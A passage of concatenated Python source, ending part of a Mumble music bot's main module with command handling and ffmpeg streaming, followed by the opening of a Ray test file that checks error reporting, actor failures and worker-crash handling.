wi_addr = var.config.get("webinterface", "listening_addr")
wi_port = var.config.getint("webinterface", "listening_port")
interface.init_proxy()
tt = threading.Thread(target=start_web_interface, args=(wi_addr, wi_port))
tt.daemon = True
tt.start()
if args.host:
host = args.host
else:
host = var.config.get("server", "host")
if args.port:
port = args.port
else:
port = var.config.getint("server", "port")
if args.password:
password = args.password
else:
password = var.config.get("server", "password")
if args.channel:
channel = args.channel
else:
channel = var.config.get("server", "channel")
self.channel = channel.strip()
if args.user:
self.username = args.user
else:
self.username = var.config.get("bot", "username")
self.mumble = pymumble.Mumble(host, user=self.username, port=port, password=password,
debug=var.config.getboolean('debug', 'mumbleConnection'), certfile=args.certificate)
self.mumble.callbacks.set_callback("text_received", self.message_received)
self.mumble.set_codec_profile("audio")
self.mumble.start() # start the mumble thread
self.mumble.is_ready() # wait for the connection
self.set_comment()
self.mumble.users.myself.unmute() # by sure the user is not muted
if self.channel:
self.mumble.channels.find_by_name(self.channel).move_in()
self.mumble.set_bandwidth(200000)
self.loop()
def ctrl_caught(self, signal, frame):
logging.info("\nSIGINT caught, quitting, {} more to kill".format(2 - self.nb_exit))
self.exit = True
self.stop()
if self.nb_exit > 1:
logging.info("Forced Quit")
sys.exit(0)
self.nb_exit += 1
def message_received(self, text):
message = text.message.strip()
user = self.mumble.users[text.actor]['name']
if var.config.getboolean('command', 'split_username_at_space'):
user = user.split()[0]
if message[0] == var.config.get('command', 'command_symbol'):
message = message[1:].split(' ', 1)
if len(message) > 0:
command = message[0]
parameter = ''
if len(message) > 1:
parameter = message[1]
else:
return
logging.info(command + ' - ' + parameter + ' by ' + user)
if command == var.config.get('command', 'joinme'):
self.mumble.users.myself.move_in(self.mumble.users[text.actor]['channel_id'])
return
if not self.is_admin(user) and not var.config.getboolean('bot', 'allow_other_channel_message') and self.mumble.users[text.actor]['channel_id'] != self.mumble.users.myself['channel_id']:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_in_my_channel'))
return
if not self.is_admin(user) and not var.config.getboolean('bot', 'allow_private_message') and text.session:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'pm_not_allowed'))
return
for i in var.db.items("user_ban"):
if user.lower() == i[0]:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'user_ban'))
return
if command == var.config.get('command', 'user_ban'):
if self.is_admin(user):
if parameter:
self.mumble.users[text.actor].send_message(util.user_ban(parameter))
else:
self.mumble.users[text.actor].send_message(util.get_user_ban())
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
return
elif command == var.config.get('command', 'user_unban'):
if self.is_admin(user):
if parameter:
self.mumble.users[text.actor].send_message(util.user_unban(parameter))
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
return
elif command == var.config.get('command', 'url_ban'):
if self.is_admin(user):
if parameter:
self.mumble.users[text.actor].send_message(util.url_ban(self.get_url_from_input(parameter)))
else:
self.mumble.users[text.actor].send_message(util.get_url_ban())
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
return
elif command == var.config.get('command', 'url_unban'):
if self.is_admin(user):
if parameter:
self.mumble.users[text.actor].send_message(util.url_unban(self.get_url_from_input(parameter)))
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
return
if parameter:
for i in var.db.items("url_ban"):
if self.get_url_from_input(parameter.lower()) == i[0]:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'url_ban'))
return
if command == var.config.get('command', 'play_file') and parameter:
music_folder = var.config.get('bot', 'music_folder')
# sanitize "../" and so on
path = os.path.abspath(os.path.join(music_folder, parameter))
if path.startswith(music_folder):
if os.path.isfile(path):
filename = path.replace(music_folder, '')
music = {'type': 'file',
'path': filename,
'user': user}
var.playlist.append(music)
else:
# try to do a partial match
matches = [file for file in util.get_recursive_filelist_sorted(music_folder) if parameter.lower() in file.lower()]
if len(matches) == 0:
self.send_msg(var.config.get('strings', 'no_file'), text)
elif len(matches) == 1:
music = {'type': 'file',
'path': matches[0],
'user': user}
var.playlist.append(music)
else:
messages = var.config.get('strings', 'multiple_matches') + '<br />'
messages += '<br />'.join(matches)
self.send_msg(messages, text)
else:
self.send_msg(var.config.get('strings', 'bad_file'), text)
self.async_download_next()
elif command in [var.config.get('command', 'play_url'),
var.config.get('command', 'play_search')] and parameter:
if command == var.config.get('command', 'play_search'):
parameter = media.url.search_youtube_url(parameter)
if not parameter:
self.send_msg(var.config.get('strings', 'unable_download'), text)
return
music = {'type': 'url',
'url': self.get_url_from_input(parameter),
'user': user,
'ready': 'validation'}
var.playlist.append(music)
if media.url.get_url_info():
if var.playlist[-1]['duration'] > var.config.getint('bot', 'max_track_duration'):
var.playlist.pop()
self.send_msg(var.config.get('strings', 'too_long'), text)
else:
for i in var.db.options("url_ban"):
print(i, ' -> ', {var.playlist[-1]["url"]})
if var.playlist[-1]['url'] == i:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'url_ban'))
var.playlist.pop()
return
var.playlist[-1]['ready'] = "no"
self.async_download_next()
else:
var.playlist.pop()
self.send_msg(var.config.get('strings', 'unable_download'), text)
elif command == var.config.get('command', 'play_playlist') and parameter:
offset = 0
try:
offset = int(parameter.split(" ")[-1])
except ValueError:
pass
if media.playlist.get_playlist_info(url=self.get_url_from_input(parameter), start_index=offset, user=user):
self.async_download_next()
elif command == var.config.get('command', 'play_autoplay') and parameter:
parameter = media.url.search_youtube_url(parameter)
music = {'type': 'url',
'url': self.get_url_from_input(parameter),
'user': user,
'ready': 'validation'}
var.playlist.append(music)
for i in range(var.config.getint('bot', 'max_track_playlist')):
if media.url.get_url_info():
if var.playlist[-1]['duration'] > var.config.getint('bot', 'max_track_duration'):
var.playlist.pop()
self.send_msg(var.config.get('strings', 'too_long'), text)
else:
for i in var.db.options("url_ban"):
print(i, ' -> ', {var.playlist[-1]["url"]})
if var.playlist[-1]['url'] == i:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'url_ban'))
var.playlist.pop()
return
var.playlist[-1]['ready'] = "no"
self.async_download_next()
parameter = media.url.get_youtube_recommendation(parameter)
music = {'type': 'url',
'url': self.get_url_from_input(parameter),
'user': user,
'ready': 'validation'}
var.playlist.append(music)
else:
var.playlist.pop()
self.send_msg(var.config.get('strings', 'unable_download'), text)
elif command == var.config.get('command', 'play_radio') and parameter:
if var.config.has_option('radio', parameter):
parameter = var.config.get('radio', parameter)
music = {'type': 'radio',
'url': self.get_url_from_input(parameter),
'user': user}
var.playlist.append(music)
self.async_download_next()
elif command == var.config.get('command', 'help'):
self.send_msg(var.config.get('strings', 'help'), text)
elif command == var.config.get('command', 'stop'):
self.stop()
elif command == var.config.get('command', 'kill'):
if self.is_admin(user):
self.stop()
self.exit = True
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
elif command == var.config.get('command', 'update'):
if self.is_admin(user):
self.mumble.users[text.actor].send_message("Starting the update")
tp = sp.check_output([var.config.get('bot', 'pip3_path'), 'install', '--upgrade', 'youtube-dl']).decode()
messages = []
need_restart = False
if "Requirement already up-to-date" in tp:
messages.append("Youtube-dl is up-to-date")
else:
messages.append("Update done : " + tp.split('Successfully installed')[1])
if 'up to date' in sp.check_output(['/usr/bin/git', 'pull']).decode():
messages.append("I'm up-to-date")
else:
messages.append("Updated source code, restarting..")
need_restart = True
self.mumble.users[text.actor].send_message('<br>'.join(messages))
if need_restart:
sp.check_output([var.config.get('bot', 'pip3_path'), 'install', '-r', 'requirements.txt']).decode()
os.execv(sys.executable, ['python'] + sys.argv)
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'not_admin'))
elif command == var.config.get('command', 'stop_and_getout'):
self.stop()
if self.channel:
self.mumble.channels.find_by_name(self.channel).move_in()
elif command == var.config.get('command', 'volume'):
if parameter is not None and parameter.isdigit() and 0 <= int(parameter) <= 100:
self.volume = float(float(parameter) / 100)
self.send_msg(var.config.get('strings', 'change_volume') % (
int(self.volume * 100), self.mumble.users[text.actor]['name']), text)
var.db.set('bot', 'volume', str(self.volume))
else:
self.send_msg(var.config.get('strings', 'current_volume') % int(self.volume * 100), text)
elif command == var.config.get('command', 'current_music'):
if len(var.playlist) > 0:
source = var.playlist[0]["type"]
if source == "radio":
reply = "[radio] {title} on {url} by {user}".format(
title=media.radio.get_radio_title(var.playlist[0]["url"]),
url=var.playlist[0]["title"],
user=var.playlist[0]["user"]
)
elif source == "url" and 'from_playlist' in var.playlist[0]:
reply = "[playlist] {title} (from the playlist <a href=\"{url}\">{playlist}</a> by {user}".format(
title=var.playlist[0]["title"],
url=var.playlist[0]["playlist_url"],
playlist=var.playlist[0]["playlist_title"],
user=var.playlist[0]["user"]
)
elif source == "url":
reply = "[url] {title} (<a href=\"{url}\">{url}</a>) by {user}".format(
title=var.playlist[0]["title"],
url=var.playlist[0]["url"],
user=var.playlist[0]["user"]
)
elif source == "file":
reply = "[file] {title} by {user}".format(
title=var.playlist[0]["title"],
user=var.playlist[0]["user"])
else:
reply = "ERROR"
logging.error(var.playlist)
else:
reply = var.config.get('strings', 'not_playing')
self.send_msg(reply, text)
elif command == var.config.get('command', 'skip'):
if parameter == '':
parameter = 0
elif parameter.isdigit():
parameter = int(parameter)
else:
self.send_msg(var.config.get('strings', 'no_possible'), text)
return
if len(var.playlist) > 0:
removed = var.playlist.pop(parameter)
removed = removed.get('title', removed['url'])
self.send_msg(var.config.get('strings', 'removing_item') % removed, text)
if len(var.playlist) == 0:
self.stop()
else:
self.launch_music()
self.async_download_next()
if len(var.playlist) == 0:
self.send_msg(var.config.get('strings', 'queue_empty'), text)
elif command == var.config.get('command', 'list'):
folder_path = var.config.get('bot', 'music_folder')
files = util.get_recursive_filelist_sorted(folder_path)
if files:
self.send_msg('<br>'.join(files), text)
else:
self.send_msg(var.config.get('strings', 'no_file'), text)
elif command == var.config.get('command', 'queue'):
if len(var.playlist) <= 1:
messages = var.config.get('strings', 'queue_empty')
else:
messages = var.config.get('strings', 'queue_contents') + '<br />'
i = 1
for value in var.playlist[1:]:
messages += '[{}] ({}) {}<br />'.format(i, value['type'], value['title'] if 'title' in value else value['url'])
i += 1
self.send_msg(messages, text)
elif command == var.config.get('command', 'repeat'):
var.playlist.append(var.playlist[0])
else:
self.mumble.users[text.actor].send_message(var.config.get('strings', 'bad_command'))
@staticmethod
def is_admin(user):
list_admin = var.config.get('bot', 'admin').split(';')
if user in list_admin:
return True
else:
return False
@staticmethod
def next():
logging.debug("Next into the queue")
if len(var.playlist) > 1:
var.playlist.pop(0)
return True
elif len(var.playlist) == 1:
var.playlist.pop(0)
return False
else:
return False
def launch_music(self):
uri = ""
logging.debug("launch_music asked" + str(var.playlist[0]))
if var.playlist[0]["type"] == "url":
media.system.clear_tmp_folder(var.config.get('bot', 'tmp_folder'), var.config.getint('bot', 'tmp_folder_max_size'))
if var.playlist[0]["ready"] == "downloading":
return
elif var.playlist[0]["ready"] != "yes":
logging.info("Current music wasn't ready, Downloading...")
self.download_music(index=0)
uri = var.playlist[0]['path']
if os.path.isfile(uri):
audio = EasyID3(uri)
title = ""
if audio["title"]:
title = audio["title"][0]
path_thumbnail = var.playlist[0]['path'][:-4] + '.jpg' # Remove .mp3 and add .jpg
thumbnail_html = ""
if os.path.isfile(path_thumbnail):
im = Image.open(path_thumbnail)
im.thumbnail((100, 100), Image.ANTIALIAS)
buffer = BytesIO()
im.save(buffer, format="JPEG")
thumbnail_base64 = base64.b64encode(buffer.getvalue())
thumbnail_html = '<img - src="data:image/PNG;base64,' + thumbnail_base64.decode() + '"/>'
logging.debug("Thunbail data " + thumbnail_html)
if var.config.getboolean('bot', 'announce_current_music'):
self.send_msg(var.config.get('strings', 'now_playing') % (title, thumbnail_html))
else:
logging.error("Error with the path during launch_music")
pass
elif var.playlist[0]["type"] == "file":
uri = var.config.get('bot', 'music_folder') + var.playlist[0]["path"]
elif var.playlist[0]["type"] == "radio":
uri = var.playlist[0]["url"]
title = media.radio.get_radio_server_description(uri)
var.playlist[0]["title"] = title
if var.config.getboolean('debug', 'ffmpeg'):
ffmpeg_debug = "debug"
else:
ffmpeg_debug = "warning"
command = ["ffmpeg", '-v', ffmpeg_debug, '-nostdin', '-i', uri, '-filter:a', 'loudnorm', '-ac', '1', '-f', 's16le', '-ar', '48000', '-']
logging.info("FFmpeg command : " + " ".join(command))
self.thread = sp.Popen(command, stdout=sp.PIPE, bufsize=480)
self.is_playing = True
def download_music(self, index):
if var.playlist[index]['type'] == 'url' and var.playlist[index]['ready'] == "validation":
if media.url.get_url_info(index=index):
if var.playlist[index]['duration'] > var.config.getint('bot', 'max_track_duration'):
var.playlist.pop()
logging.info("the music " + var.playlist[index]["url"] + " has a duration of " + var.playlist[index]['duration'] + "s -- too long")
self.send_msg(var.config.get('strings', 'too_long'))
return
else:
var.playlist[index]['ready'] = "no"
else:
var.playlist.pop(index)
logging.error("Error while fetching info from the URL")
self.send_msg(var.config.get('strings', 'unable_download'))
if var.playlist[index]['type'] == 'url' and var.playlist[index]['ready'] == "no":
var.playlist[index]['ready'] = "downloading"
logging.debug("Download index:" + str(index))
logging.debug(var.playlist[index])
url = var.playlist[index]['url']
url_hash = hashlib.md5(url.encode()).hexdigest()
path = var.config.get('bot', 'tmp_folder') + url_hash + ".%(ext)s"
mp3 = path.replace(".%(ext)s", ".mp3")
var.playlist[index]['path'] = mp3
# if os.path.isfile(mp3):
# audio = EasyID3(mp3)
# var.playlist[index]['title'] = audio["title"][0]
ydl_opts = ""
ydl_opts = {
'format': 'bestaudio/best',
'outtmpl': path,
'noplaylist': True,
'writethumbnail': True,
'updatetime': False,
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192'},
{'key': 'FFmpegMetadata'}]
}
self.send_msg(var.config.get('strings', "download_in_progress") % var.playlist[index]['title'])
logging.info("Information before start downloading :" + str(var.playlist[index]))
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
for i in range(2):
try:
ydl.extract_info(url)
if 'ready' in var.playlist[index] and var.playlist[index]['ready'] == "downloading":
var.playlist[index]['ready'] = "yes"
except youtube_dl.utils.DownloadError:
pass
else:
break
return
def async_download_next(self):
logging.info("Async download next asked")
if len(var.playlist) > 1 and var.playlist[1]['type'] == 'url' and var.playlist[1]['ready'] in ["no", "validation"]:
th = threading.Thread(target=self.download_music, kwargs={'index': 1})
else:
return
logging.info("Start downloading next in thread")
th.daemon = True
th.start()
@staticmethod
def get_url_from_input(string):
if string.startswith('http'):
return string
p = re.compile('href="(.+?)"', re.IGNORECASE)
res = re.search(p, string)
if res:
return res.group(1)
else:
return False
def loop(self):
raw_music = ""
while not self.exit and self.mumble.isAlive():
while self.mumble.sound_output.get_buffer_size() > 0.5 and not self.exit:
time.sleep(0.01)
if self.thread:
raw_music = self.thread.stdout.read(480)
if raw_music:
self.mumble.sound_output.add_sound(audioop.mul(raw_music, 2, self.volume))
else:
time.sleep(0.1)
else:
time.sleep(0.1)
if self.thread is None or not raw_music:
if self.is_playing:
self.is_playing = False
self.next()
if len(var.playlist) > 0:
if var.playlist[0]['type'] in ['radio', 'file'] \
or (var.playlist[0]['type'] == 'url' and var.playlist[0]['ready'] not in ['validation', 'downloading']):
self.launch_music()
self.async_download_next()
while self.mumble.sound_output.get_buffer_size() > 0:
time.sleep(0.01)
time.sleep(0.5)
if self.exit:
util.write_db()
def stop(self):
if self.thread:
self.thread.kill()
self.thread = None
var.playlist = []
self.is_playing = False
def set_comment(self):
self.mumble.users.myself.comment(var.config.get('bot', 'comment'))
def send_msg(self, msg, text=None):
if not text or not text.session:
own_channel = self.mumble.channels[self.mumble.users.myself['channel_id']]
own_channel.send_text_message(msg)
else:
self.mumble.users[text.actor].send_message(msg)
def start_web_interface(addr, port):
logging.info('Starting web interface on {}:{}'.format(addr, port))
interface.web.run(port=port, host=addr)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Bot for playing music on Mumble')
# General arguments
parser.add_argument("--config", dest='config', type=str, default='configuration.ini', help='Load configuration from this file. Default: configuration.ini')
parser.add_argument("--db", dest='db', type=str, default='db.ini', help='database file. Default db.ini')
parser.add_argument("-q", "--quiet", dest="quiet", action="store_true", help="Only Error logs")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", help="Show debug log")
# Mumble arguments
parser.add_argument("-s", "--server", dest="host", type=str, help="Hostname of the Mumble server")
parser.add_argument("-u", "--user", dest="user", type=str, help="Username for the bot")
parser.add_argument("-P", "--password", dest="password", type=str, help="Server password, if required")
parser.add_argument("-p", "--port", dest="port", type=int, help="Port for the Mumble server")
parser.add_argument("-c", "--channel", dest="channel", type=str, help="Default channel for the bot")
parser.add_argument("-C", "--cert", dest="certificate", type=str, default=None, help="Certificate file")
args = parser.parse_args()
var.dbfile = args.db
config = configparser.ConfigParser(interpolation=None, allow_no_value=True)
parsed_configs = config.read(['configuration.default.ini', args.config], encoding='latin-1')
db = configparser.ConfigParser(interpolation=None, allow_no_value=True, delimiters='²')
db.read(var.dbfile, encoding='latin-1')
if len(parsed_configs) == 0:
logging.error('Could not read configuration from file \"{}\"'.format(args.config), file=sys.stderr)
sys.exit()
var.config = config
var.db = db
botamusique = MumbleBot(args)
|
test_failure.py
|
import json
import logging
import os
import signal
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
from ray.experimental.internal_kv import _internal_kv_get
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.utils
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (wait_for_condition, SignalActor, init_error_pubsub,
get_error_message, Semaphore)
def test_unhandled_errors(ray_start_regular):
@ray.remote
def f():
raise ValueError()
@ray.remote
class Actor:
def f(self):
raise ValueError()
a = Actor.remote()
num_exceptions = 0
def interceptor(e):
nonlocal num_exceptions
num_exceptions += 1
# Test we report unhandled exceptions.
ray.worker._unhandled_error_handler = interceptor
x1 = f.remote()
x2 = a.f.remote()
del x1
del x2
wait_for_condition(lambda: num_exceptions == 2)
# Test we don't report handled exceptions.
x1 = f.remote()
x2 = a.f.remote()
with pytest.raises(ray.exceptions.RayError) as err: # noqa
ray.get([x1, x2])
del x1
del x2
time.sleep(1)
assert num_exceptions == 2, num_exceptions
# Test suppression with env var works.
try:
os.environ["RAY_IGNORE_UNHANDLED_ERRORS"] = "1"
x1 = f.remote()
del x1
time.sleep(1)
assert num_exceptions == 2, num_exceptions
finally:
del os.environ["RAY_IGNORE_UNHANDLED_ERRORS"]
def test_failed_task(ray_start_regular, error_pubsub):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_returns=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
p = error_pubsub
throw_exception_fct1.remote()
throw_exception_fct1.remote()
msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
assert len(msgs) == 2
for msg in msgs:
assert "Test function 1 intentionally failed." in msg.error_message
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_push_error_to_driver_through_redis(ray_start_regular, error_pubsub):
address_info = ray_start_regular
address = address_info["redis_address"]
redis_client = ray._private.services.create_redis_client(
address, password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
error_message = "Test error message"
ray.utils.push_error_to_driver_through_redis(
redis_client, ray_constants.DASHBOARD_AGENT_DIED_ERROR, error_message)
errors = get_error_message(error_pubsub, 1,
ray_constants.DASHBOARD_AGENT_DIED_ERROR)
assert errors[0].type == ray_constants.DASHBOARD_AGENT_DIED_ERROR
assert errors[0].error_message == error_message
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
errors = get_error_message(
p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
assert "No module named" in errors[0].error_message
assert "No module named" in errors[1].error_message
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
p = error_pubsub
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
# Check that the error message is in the task info.
errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
assert "Function to run failed." in errors[0].error_message
assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
errors = get_error_message(p, 2)
assert len(errors) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
errors = get_error_message(p, 2)
assert len(errors) == 2
for error in errors:
# Wait for the error to arrive.
if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
assert "No module named" in error.error_message
else:
# Wait for the error from when the __init__ tries to run.
assert ("failed to be imported, and so cannot execute this method"
in error.error_message)
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert ("failed to be imported, and so cannot execute this method" in
errors[0].error_message)
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
p = error_pubsub
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
p = error_pubsub
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.WorkerCrashedError):
ray.get(f.remote())
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def __init__(self):
# This log is added to debug a flaky test issue.
print(os.getpid())
def ping(self):
pass
a = Actor.remote()
# Without this waiting, there seems to be race condition happening
# in the CI. This is not a fundamental fix for that, but it at least
# makes the test less flaky.
ray.get(a.ping.remote())
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
errors = get_error_message(p, 1)
assert len(errors) == 0, "Should not have propogated an error - {}".format(
errors)
def test_exception_chain(ray_start_regular):
@ray.remote
def bar():
return 1 / 0
@ray.remote
def foo():
return ray.get(bar.remote())
r = foo.remote()
try:
ray.get(r)
except ZeroDivisionError as ex:
assert isinstance(ex, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
